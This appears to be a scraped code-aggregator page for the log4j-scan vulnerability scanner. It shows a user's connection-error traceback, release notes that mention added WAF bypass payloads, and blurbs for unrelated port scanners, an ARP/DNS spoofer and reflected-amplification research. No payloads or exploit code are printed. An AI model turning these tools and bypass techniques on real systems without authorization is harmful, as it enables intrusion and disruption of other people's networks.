    Traceback (most recent call last): File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 400, in increment raise six.reraise(type(error), error, _stacktrace) File "/usr/lib/python3/dist-packages/six.py", line 702, in reraise raise value.with_traceback(tb) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 376, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 996, in validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 366, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl.py", line 370, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.8/ssl.py", line 500, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.8/ssl.py", line 1040, in _create self.do_handshake() File "/usr/lib/python3.8/ssl.py", line 1309, in do_handshake self._sslobj.do_handshake() urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "log4j-scan.py", line 412, in main() File "log4j-scan.py", line 382, in main dns_callback = Interactsh() File "log4j-scan.py", line 239, in init self.register() File "log4j-scan.py", line 247, in register res = self.session.post( File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 578, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 530, in request resp = self.send(prep, **send_kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 643, in send r = adapter.send(request, **kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 498, in send raise ConnectionError(err, request=request) requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    opened by GiuBravo 1
Releases(v.1.1.0)
  • v.1.1.0(Oct 20, 2022)

  • v1.0.1(Dec 25, 2021)

    • [x] Added additional 15 community-provided WAF bypass payloads (Total payloads: 23 payloads).
    • [x] Added additional common default POST parameters.
    • [x] Added --custom-waf-bypass-payload to add user-defined custom WAF bypass payload.
    • [x] Fixed a minor exception when "Referer" is not set on the headers-file list.
    • [x] Typo and PEP8 related clean-ups.
    Source code(tar.gz)
    Source code(zip)
  • v1.0.0(Dec 25, 2021)

Owner
FullHunt
Expose Your Attack Surface
FullHunt
This tool is for finding more detailed information of an IP Address.

This tool is for finding more detailed information of an IP Address.

null 3 Oct 8, 2021
This is a python based command line Network Scanner utility, which input as an argument for the exact IP address or the relative IP Address range you wish to do the Network Scan for and returns all the available IP addresses with their MAC addresses on your current Network.

This is a python based command line Network Scanner utility, which input as an argument for the exact IP address or the relative IP Address range you wish to do the Network Scan for and returns all the available IP addresses with their MAC addresses on your current Network.

Abhinandan Khurana 1 Feb 9, 2022
PetrickScanner is a simple Python OOP TCP Port Scanner

PetrickScanner PetrickScanner is a simple Python OOP TCP Port Scanner Functions Python TCP Port Scanner DNS Resolver Random Scanner PLEASE ANY PROBLEM

null 11 Nov 30, 2021
RollerScanner — Fast Port Scanner Written On Python

RollerScanner RollerScanner — Fast Port Scanner Written On Python Installation You should clone this repository using: git clone https://github.com/Ma

null 68 Nov 9, 2022
Simple Port Scanner script written in Python, plans is to expand upon this script to turn it into a GUI based pen testing suite

PortScanner Simple Port Scanner script written in Python, plans is to expand upon this script to turn it into a GUI based pen testing suite. #IMPORTAN

null 1 Oct 23, 2021
openPortScanner is a port scanner made with Python!

Port Scanner made with python • Installation • Usage • Commands Installation Run this to install: $ git clone https://github.com/Miguel-Galdin0/openPo

Miguel Galdino 7 Jan 9, 2022
Simple Port Scanner With Socket Module In Python 3x

PortScanner Simple Port Scanner With Socket Module In Python 3x How To Install Requirements Of This Port Scanner sudo apt install python3;sudo apt ins

null 1 Nov 23, 2021
A simple port scanner for Web/ip scanning Port 0/500 editable inside the .py file

Simple-Port-Scanner a simple port scanner for Web/ip scanning Port 0/500 editable inside the .py file Open Cmd/Terminal Cmd Downloads Run Command: pip

YABOI 1 Nov 22, 2021
Ipscanner - A simple threaded IP-Scanner written in python3 that can monitor local IP's in your network

IPScanner ?? A simple threaded IP-Scanner written in python3 that can monitor lo

null 4 Dec 12, 2022
Automated network configuration backups using Github actions and git-scraping

Network Config Scraper This repository demonstrates the use of Github Actions and git-scraping to build an automated backup solution for network confi

WWT 19 Dec 14, 2022
Simple python script for automated network scans with random name generator(useful for CTF boxes).

?? Automated NMAP script Description Simple python script for automated network scans with random name generator(useful for CTF boxes). Requirements 1

Dhmos Funk 2 Oct 29, 2021
This is the code repository for the USENIX Security 2021 paper, "Weaponizing Middleboxes for TCP Reflected Amplification".

weaponizing-censors Censors pose a threat to the entire Internet. In this work, we show that censoring middleboxes and firewalls can be weaponized by

UMD Breakerspace 119 Dec 31, 2022
Fast and configurable script to get and check free HTTP, SOCKS4 and SOCKS5 proxy lists from different sources and save them to files

Fast and configurable script to get and check free HTTP, SOCKS4 and SOCKS5 proxy lists from different sources and save them to files. It can also get geolocation for each proxy and check if proxies are anonymous.

Almaz 385 Dec 31, 2022
A TCP Chatroom built with python and TCP/IP sockets, consisting of a server and multiple clients which can connect with the server and chat with each other.

A TCP Chatroom built with python and TCP/IP sockets, consisting of a server and multiple clients which can connect with the server and chat with each other. It also provides an Admin role with features including kicking and baning of users.

null 3 May 22, 2022
List of ngrok alternatives and other ngrok-like tunneling software and services. Focus on self-hosting.

List of ngrok alternatives and other ngrok-like tunneling software and services. Focus on self-hosting.

Anders Pitman 7.3k Jan 3, 2023
NetworkX is a Python package for the creation, manipulation, and study of the structure, dynamics, and functions of complex networks.

NetworkX is a Python package for the creation, manipulation, and study of the structure, dynamics, and functions of complex networks.

NetworkX 12k Jan 2, 2023
Start a simple TCP Listener on a specified IP Address and Port Number and receive incoming connections.

About Start a simple TCP Listener on a specified IP Address and Port Number and receive incoming connections. Download Clone using git in terminal(git

AgentGeneric 5 Feb 24, 2022
An advanced real time threat intelligence framework to identify threats and malicious web traffic on the basis of IP reputation and historical data.

ARTIF is a new advanced real time threat intelligence framework built that adds another abstraction layer on the top of MISP to identify threats and malicious web traffic on the basis of IP reputation and historical data. It also performs automatic enrichment and threat scoring by collecting, processing and correlating observables based on different factors.

CRED 225 Dec 31, 2022
🥑 A Python ARP and DNS Spoofer CLI and INTERFACE 🥓

NEXTGEN SPOOFER ?? A Python ARP and DNS Spoofer CLI and INTERFACE ?? CLI -> advanced pentesters INTERFACE -> beginners SetUp Make sure you installed P

null 9 Dec 25, 2022